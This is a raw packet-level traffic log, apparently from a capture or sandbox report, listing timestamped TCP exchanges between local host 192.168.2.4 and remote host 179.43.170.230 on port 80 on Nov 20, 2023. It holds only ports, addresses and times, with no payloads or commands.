Nov 20, 2023 05:21:12.544320107 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.544352055 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.544707060 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.544744968 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.544759989 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.544791937 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.545340061 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.545378923 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.545393944 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.545418024 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.546417952 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.546457052 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.546478033 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.546499014 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.547584057 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.547622919 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.547632933 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.547662973 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.550054073 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.550105095 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.550112963 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.550153971 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.550633907 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.550673008 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.550688982 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.550720930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.552288055 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.552328110 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.552342892 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.552366972 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.552376032 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.552407026 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.552407980 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.552452087 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.552465916 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.552505970 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.552514076 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.552566051 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.552819967 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.552860022 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.552875996 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.552900076 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.553225040 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.553278923 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.553284883 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.553332090 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.553632975 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.553670883 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.553685904 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.553714991 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.554933071 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.554971933 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.555001020 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.555033922 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.555527925 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.555567980 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.555591106 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.555614948 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.560128927 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.560194016 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.560194016 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.560234070 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.560534000 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.560551882 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.560585976 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.560606003 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.560941935 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.560960054 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.560998917 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.561012983 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.561377048 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.561394930 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.561424971 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.561436892 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.561758995 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.561791897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.561806917 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.561830997 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.562913895 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.562931061 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.562958002 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.562982082 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.564620972 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.564639091 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.564673901 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.564687014 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.565387964 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.565406084 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.565434933 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.565454960 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.570271969 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.570290089 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.570323944 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.570343971 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.570647001 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.570666075 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.570700884 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.570722103 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.573010921 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.573062897 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.573090076 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.573134899 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.573350906 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.573369026 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.573400021 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.573420048 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.573853016 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.573905945 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.574645996 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.574664116 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.574697018 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.574712038 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.575117111 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.575166941 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.576369047 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.576421976 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.579699993 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.579718113 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.579754114 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.579771996 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.580087900 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.580136061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.580926895 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.580976009 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.582772970 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.582789898 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.582822084 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.582840919 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.583092928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.583139896 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.583925962 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.583944082 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.583976984 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.583992958 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.584755898 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.584794044 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.584813118 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.584840059 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.585589886 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.585628033 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.585647106 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.585674047 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.586397886 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.586452961 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.587318897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.587359905 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.587383986 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.587400913 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.590289116 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.590409040 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.591542006 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.591597080 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.591602087 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.591654062 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.592492104 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.592550993 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.724133015 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.724174023 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.724222898 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.724258900 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.724869967 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.724909067 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.724922895 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.724956036 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.725707054 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.725745916 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.725759983 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.725784063 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.726496935 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.726547003 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.726974010 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.727026939 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.728204966 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.728245020 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.728266954 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.728286028 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.729074955 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.729139090 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.729899883 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.729938984 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.729952097 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.729979038 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.730745077 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.730783939 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.730794907 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.730828047 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.731159925 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.731197119 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.731209040 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.731239080 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.731983900 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.732023001 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.732032061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.732063055 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.732774973 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.732815027 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.732825041 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.732856989 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.733237028 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.733289003 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.734113932 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.734153032 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.734167099 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.734194040 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.737512112 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.737551928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.737564087 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.737592936 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.738387108 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.738435030 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.739614010 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.739651918 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.739666939 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.739692926 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.740025043 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.740134954 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.741703987 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.741743088 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.741754055 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.741785049 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.742156029 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.742207050 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.743891954 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.743943930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.746889114 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.746927023 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.746937990 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.746965885 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.747268915 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.747308016 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.747318983 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.747350931 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.747711897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.747760057 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.748122931 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.748171091 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.749074936 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.749123096 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.749906063 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.749957085 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.753884077 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.753935099 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.754671097 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.754710913 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.754722118 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.754753113 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.755121946 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.755171061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.755966902 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.756022930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.757680893 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.757720947 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.757750034 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.757780075 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.758023024 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.758065939 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.759748936 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.759793043 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.760210991 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.760276079 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.760998011 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.761015892 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.761040926 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.761059046 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.762737036 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.762792110 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.763573885 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.763624907 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.763993979 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.764038086 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.764452934 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.764472008 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.764489889 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.764512062 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.765239000 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.765290976 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.766086102 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.766118050 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.766129017 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.766149044 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.767318010 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.767333984 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.767375946 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.768235922 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.768260956 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.768274069 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.768295050 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.769360065 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.769377947 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.769402981 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.769418955 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.769785881 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.769824982 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.771112919 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.771182060 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.775398970 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.775417089 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.775444984 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.775463104 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.776607990 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.776626110 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.776652098 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.776669025 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.777019978 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.777066946 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.777862072 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.777899981 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.778649092 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.778685093 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.778686047 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.778721094 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.779103994 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.779123068 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.779144049 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.779160976 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.779920101 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.779937029 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.779957056 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.779973984 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.780708075 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.780725956 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.780750990 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.780767918 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.781147957 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.781219006 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.782008886 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.782027960 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.782052040 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.782077074 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.782799959 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.782839060 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.782850981 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.782892942 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.783687115 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.783704996 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.783730984 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.783747911 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.784096003 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.784145117 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.787571907 CET	80	49731	179.43.170.230	192.168.2.4
